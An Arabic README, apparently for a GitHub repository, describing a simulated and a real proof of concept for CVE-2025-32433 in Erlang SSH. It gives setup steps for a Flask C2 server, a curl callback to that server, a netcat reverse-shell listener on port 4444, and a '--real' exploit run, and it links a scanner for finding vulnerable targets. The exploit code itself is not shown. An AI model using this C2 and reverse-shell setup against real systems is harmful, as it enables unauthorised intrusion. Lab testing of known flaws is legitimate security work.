
إثبات المفهوم لاستغلال CVE-2025-32433 مع أنماط هجوم محاكاة وحقيقية، بما في ذلك خادم C2 مبني على Flask لردود الصدفة العكسية ومحاكاة ما بعد الاستغلال.
يحتوي هذا المستودع على كود يوضح CVE حقيقي (CVE-2025-32433).
استخدمه فقط في البيئات التي لديك فيها إذن صريح.
لا تختبر هذا الاستغلال أبدًا ضد أنظمة لا تملكها أو تديرها.
الاستخدام غير المصرح به غير قانوني وغير أخلاقي ومضر بمجتمع الأمن السيبراني.
POC محاكى وحقيقي لـ CVE-2025-32433
أظهر لي صديقي Chocapikk هذا الـ poc الذي وجده erling_cve.py، كنت مفتونًا وأردت اختباره في بيئة آمنة.
لديك خياران مع هذا المستودع: النص المحاكى الآمن والنظام الذي أوضحه أدناه.
أو يمكنك استخدام النص الحقيقي erling_cve.py (بطريقة أخلاقية مع الحذر وفقط على الشبكات التي لديك إذن لاختبارها)
قبل استخدام هذه الأداة لاختبار أو تشغيل استغلال فعلي، تحقق من صديقي m0usemm0use ونصه البايثون للعثور على أهداف ضعيفة لـ CVE-2025-32433!!!!
https://github.com/m0usem0use/erl_mouse
نسخة محاكاة من الاستغلال لـ CVE-2025-32433
إعداد خادم C2
قم ببناء C2 يعتمد على Python Flask : قوي لاستدعاءات البوت أو الصدور العكسية.
شغل هذا النص الإعدادي على خادم C2
apt update && apt install python3-pip git -y
sudo apt install python3-flask
mkdir ~/c2
cd ~/c2
nano c2_server.py (الصق نص c2_server وعدله حسب الحاجة)
شغل
python3 c2_server.py
يمكن للبوتات (أو نصوص الاختبار) استخدام curl للإبلاغ على النحو التالي
curl -X POST http://:8080/report -d "Bot is online"
إعداد بيئة Python الافتراضية على Kali
mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab
إنشاء بيئة افتراضية بايثون
python3 -m venv venv
source venv/bin/activate
sudo apt install python3-requests
اختبار الاستدعاء
nano test_callback.py (الصق نص test_callback وعدله حسب الحاجة)
شغل الاستدعاء
python3 test_callback.py
لديك الآن رسميًا
بيئة افتراضية عاملة
خادم C2 سحابي حي
حقن استدعاء وظيفي
-تحتاج أن يكون لدى الجهاز الهدف/الضحية عملية أو خدمة Erlang مكشوفة (أو محاكاة)
ماذا يفعل Eerling_cve.py؟
سنأخذ الـ PoC الشبيه بـ Erlang الذي وجدناه و
من جهاز Kali
nano poc_erlang_test.py
-الصق نص poc_erlang_test.py وعدله حسب الحاجة
افتح مستمعًا
في نافذة طرفية جديدة شغل
nc -lvnp 4444
شغل الـ poc
python poc_erlang_test.py --real